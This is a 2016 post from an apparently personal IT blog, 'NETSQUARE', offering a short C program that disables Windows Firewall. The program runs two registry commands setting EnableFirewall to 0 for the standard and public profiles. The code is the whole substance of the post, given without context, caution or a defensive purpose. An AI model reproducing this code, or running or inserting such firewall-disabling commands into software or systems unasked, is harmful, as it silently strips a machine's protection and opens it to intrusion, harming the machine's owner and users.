NETSQUARE- INFORMATION TECHNOLOGY

LET'S INTERACT AND KNOW THE LATEST TRENDS AND TECHNOLOGY. THE VIRTUAL WORLD IN WHICH WE CAN DESIRED, DREAM AND DISCOVER.

Thursday, 9 June 2016


C program to Block Windows Firewall

/* This program is to Stop the WIndows Firewall from functioning Properly. */
#include <stdio.h>
#include <stdlib.h>
#include <dos.h>
int main()
{
        system("reg add HKLM\\system\\currentcontrolset\\Services\\SharedAccess\\parameters\\firewallpolicy\\standardprofile /v EnableFirewall /t reg_dword /d 0 /f");
        system("reg add HKLM\\system\\currentcontrolset\\Services\\SharedAccess\\parameters\\firewallpolicy\\publicprofile /v EnableFirewall /t reg_dword /d 0 /f");
        return 0;
}


Posted by Unknown at 22:53
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest

No comments:

Post a Comment

Newer Post Older Post Home
Subscribe to: Post Comments (Atom)

About Me

Unknown
View my complete profile

Blog Archive

  • ▼  2016 (14)
    • ►  July (4)
    • ▼  June (10)
      • Getting ready for a party & the low battery aler...
      • सोशल इंजीनियरिंग अटैक यानी विश्वासघात व...
      • लेनोवो ने लॉन्च किया नया टैंगो स्मार्टफोन PHAB 2...
      • Google wants to use wireless to bring gigabit Wi...
      • Hands on with Lenovo’s new ‘snap-together’ Moto ...
      • NEWS FROM YAHOO! CENTRE......  After lau...
      • PROGRAM FOR ANALOGUE CLOCK IN "C"
      • C program to Block Windows Firewall/* This prog...
      • http://www.dailyo.in/technology/smartphone-iphone...
      • let's learn the basics about Bio-Matrix and auth...
Picture Window theme. Powered by Blogger.